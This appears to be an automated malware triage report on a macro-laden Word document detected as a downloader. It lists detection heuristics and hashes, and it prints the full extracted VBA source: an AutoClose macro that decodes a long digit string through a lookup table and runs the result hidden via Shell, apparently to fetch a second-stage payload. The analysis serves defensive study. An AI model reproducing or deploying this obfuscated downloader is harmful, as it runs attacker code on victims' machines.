Malware Insights
The sample contains VBA macros, including an AutoClose macro that ultimately calls the Shell() function. AutoClose passes a long digit string to a decoder function (presenza), which splits the string into two-digit pairs and uses each pair as an index into a 56-entry character lookup table (uscito); the decoded text is then handed to benda(), which executes it via Shell(). The command appears to download and run a second-stage payload, consistent with the ClamAV detection name 'Doc.Malware.Emooodldr-6711604-0'. The digit string passed to the decoder (and, once decoded, to Shell) begins '18051337495243371919151623003721150939184252521516100534344232201507263713162729303721061514395206373424263706240337291019513732065024410513321905422012511937074043060618043838050525255200002100374206'; the complete argument appears in the extracted macro below, and it is likely an obfuscated URL or command.
Heuristics (6)
- ClamAV: Doc.Malware.Emooodldr-6711604-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
- VBA project inside OOXML (medium, OOXML_VBA, 2 related findings): Document contains a VBA project; VBA macros present
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Auto_Close macro (high, OLE_VBA_AUTOCLOSE): Auto_Close macro
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All of the following were found in document text (OOXML body / shared strings):
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/drawing/2010/main
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 | ClamAV | Obfuscation or payload |
|---|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2419 bytes | 3a9a75ed139f55cd8e86f919a3b3988250f574c617250de7327190ece1dc46a6 | No threats found | likely (carved artifact contains 1 long base64-like blob) |
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 11776 bytes | d62322d8c677b8e2e9757b4c4ec25db0ce1b5b9fc18417fbfc4da23334908857 | Doc.Malware.Emooodldr-6711604-0 | likely (carved artifact contains 1 long base64-like blob) |

Preview script (macros.bas): first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Function uscito(pronome As Integer) As String
    Dim vanitoso() As Variant
    vanitoso = Array("x", "I", ";", "W", ":", "o", "t", "(", "$", "B", "C", "v", "F", "w", "S", " ", "-", "X", "p", "l", "d", "c", "g", "E", ".", "q", "N", "O", "G", "b", "j", "+", "n", "=", "m", "u", "\", "e", "/", "y", "'", "D", "a", "h", ",", "?", "k", "V", "T", "r", ")", "i", "s", "P", "f", "A")
    Dim parlato As Integer
    For parlato = LBound(vanitoso) To UBound(vanitoso)
        If parlato = pronome Then
            uscito = vanitoso(parlato)
        End If
    Next
End Function
Function presenza(orzata As String) As String
    Dim inter As Integer
    Dim rintocco As String
    Dim polenta As Variant
    polenta = trarre(Trim(orzata))
    For parlato = 0 To Len(orzata)
        Dim appunto As String
        If (parlato + 1) <= UBound(polenta) Then
            appunto = polenta(parlato) + polenta(parlato + 1)
            parlato = parlato + 1
            rintocco = rintocco + uscito(Int(appunto))
        End If
    Next
    presenza = rintocco
End Function
Function trarre(pietra As String)
    pietra = StrConv(pietra, vbUnicode)
    trarre = Split(Left(pietra, Len(pietra) - 1), vbNullChar)
End Function
Public Function benda(bacino As String)
    Shell bacino, 0
End Function
Sub AutoClose()
    Call Application.Run("benda", presenza("180513374952433719191516230037211509391842525215161005343442322015072637131627293037210615143952063734242637062403372910195137320650244105133219054220125119370740430606180438380505252552000021003742064949372421053438325132053842323946342434205440441508373211045553534155485515311540362820052437003740500215140642490616534905213752521508373211045553534155485540362820052437003740021507263713162729303721061514395206373424263706240337291019513732065024410513321905422014064951322207404306061804383805052525520000210037420649493724210534385224184318455120334232394634405002150123170707263713162729303721061514395206373424263706240337291019513732065024410513321905422014064951322207404306061804383852324218214942214619375243050624210534381318162105320637320638351819054220523855471421423224422106510532405050"))
End Sub
```